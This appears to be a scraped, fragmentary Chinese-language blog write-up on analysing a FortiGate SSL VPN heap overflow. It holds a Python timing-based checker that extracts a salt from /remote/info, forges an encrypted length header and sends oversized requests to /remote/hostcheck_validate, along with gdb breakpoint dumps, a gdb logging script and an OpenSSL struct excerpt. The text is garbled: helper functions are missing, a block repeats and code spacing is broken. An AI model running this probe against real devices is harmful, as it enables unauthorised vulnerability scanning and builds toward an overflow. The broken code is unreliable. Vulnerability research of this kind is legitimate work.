import requests, struct, hashlib, sys, os, re from urllib3.exceptions import InsecureRequestWarning from scipy.stats import ttest_ind import numpy as np
# Default 400 requests with valid length and 400 requests with too high of a length # In most cases, we should break out of the loop long before we hit this number. REQUESTS_PER_GROUP = 400
defgen_enc_hdr(salt, l): magic = b"GCC is the GNU Compiler Collection." ks = hashlib.md5(salt + b"00bfbfbf" + magic).digest() length = struct.pack("<H", l) return"00bfbfbf{:02x}{:02x}".format(length[0] ^ ks[0], length[1] ^ ks[1])
defreject_outliers(data): # This rejects ~25% of responses, but gives us much better sensitivity by filtering out random spikes in latency q3 = np.quantile(data, 0.75) returnlist(filter(lambda x: x <= q3, data))
defcheck_target(baseurl): r = requests.get(baseurl + "/remote/info", verify=False) reg = re.compile("salt='([0-9a-f]{8})'") matches = reg.findall(r.text) iflen(matches) != 1: return"ERROR: not FortiGate ssl vpn?" salt = matches[0].encode()
# allocations of size 0xe000+1-0x10000 are all in the same size class # we leave a 2KiB gap after our allocation but before the next chunk, so vulnerable devices will only corrupt unused memory alloc_size = 0xF800
overflow = [] regular = [] s = requests.Session()
for i inrange(REQUESTS_PER_GROUP): r1 = make_req(s, baseurl, salt, alloc_size, alloc_size + 0xF0) overflow.append(r1.elapsed.microseconds)
if i > 20and i % 10 == 0: nr, no, t = check_stats(regular, overflow) if nr > 20and no > 20and t.pvalue < 0.001: break _, _, t_stat = check_stats(regular, overflow)
最后通过 r 构造整个POST请求包发送给/remote/hostcheck_validate进行漏洞验证
1 2 3 4 5 6 7 8 9 10
defreject_outliers(data): # This rejects ~25% of responses, but gives us much better sensitivity by filtering out random spikes in latency q3 = np.quantile(data, 0.75) returnlist(filter(lambda x: x <= q3, data))
Num Type Disp Enb Address What 1 breakpoint keep y 0x00000000015adef9 my_je_malloc breakpoint already hit 1 time 2 breakpoint keep y 0x000000000155326b je_malloc breakpoint already hit 1 time 6 breakpoint keep y 0x00000000015ae05f decrypt_over breakpoint already hit 1 time Num Type Disp Enb Address What 1 breakpoint keep n 0x00007fce339713d0 <SSL_new> breakpoint already hit 3 times 2 breakpoint keep n 0x00000000015adef9 breakpoint already hit 19 times 4 breakpoint keep y 0x000000000155326b breakpoint already hit 4 times 5 breakpoint keep y 0x0000000001553270 breakpoint already hit 1 time 6 breakpoint keep y 0x00007fce33971402 <SSL_new+50> 7 breakpoint keep n 0x00007fce3396edf0 <SSL_do_handshake> breakpoint already hit 1 time 8 breakpoint keep n 0x00000000015ae05f breakpoint already hit 1 time 9 breakpoint keep y 0x00007fce33957f53 breakpoint already hit 4 times
# 每次写入时打开文件、写入并关闭文件 withopen(self.output_filename, 'a') as output_file: output_file.write( f"[Breakpoint hit] {self.name}: {self.register}=0x{register_value:016x}, " f"Value at {self.register}=0x{memory_value:016x}\n" ) except gdb.MemoryError: withopen(self.output_filename, 'a') as output_file: output_file.write( f"[Breakpoint hit] {self.name}: {self.register}=0x{register_value:016x}, " f"Value at {self.register}=UNREADABLE\n" ) except Exception as e: # 如果解析失败,写入错误信息 withopen(self.output_filename, 'a') as output_file: output_file.write(f"[Breakpoint hit] {self.name}: Error: {e}\n") returnFalse# 不暂停程序,继续执行
# 用户输入断点地址、寄存器名称和名称 defset_register_and_memory_watch(address, register, output_filename, name): try: PrintRegisterAndMemoryAtAddress(address, register, output_filename, name) # 每次写入时打开文件、写入并关闭文件 withopen(output_filename, 'a') as output_file: output_file.write(f"Breakpoint set at address: {address} with register: {register} and name: {name}\n") except Exception as e: withopen(output_filename, 'a') as output_file: output_file.write(f"Error setting breakpoint: {e}\n")
# 注册命令 classWatchRegisterAndMemoryCommand(gdb.Command): """Set a breakpoint at a specific address and print a register and memory at the register when hit. Usage: watch_register_c ADDRESS REGISTER NAME """ def__init__(self): super().__init__("watch_register_c", gdb.COMMAND_USER)
gdb.write("Command 'watch_register_c' loaded. Use 'Usage: watch_register_c ADDRESS REGISTER VAR_NAME FILENAME' to set a breakpoint and log a register and its memory value.\n")
structssl_st { /* * protocol version (one of SSL2_VERSION, SSL3_VERSION, TLS1_VERSION, * DTLS1_VERSION) */ int version; /* SSLv3 */ const SSL_METHOD *method; /* * There are 2 BIO's even though they are normally both the same. This * is so data can be read and written to different handlers */ /* used by SSL_read */ BIO *rbio; /* used by SSL_write */ BIO *wbio; /* used during session-id reuse to concatenate messages */ BIO *bbio; /* * This holds a variable that indicates what we were doing when a 0 or -1 * is returned. This is needed for non-blocking IO so we know what * request needs re-doing when in SSL_accept or SSL_connect */ int rwstate; int (*handshake_func) (SSL *);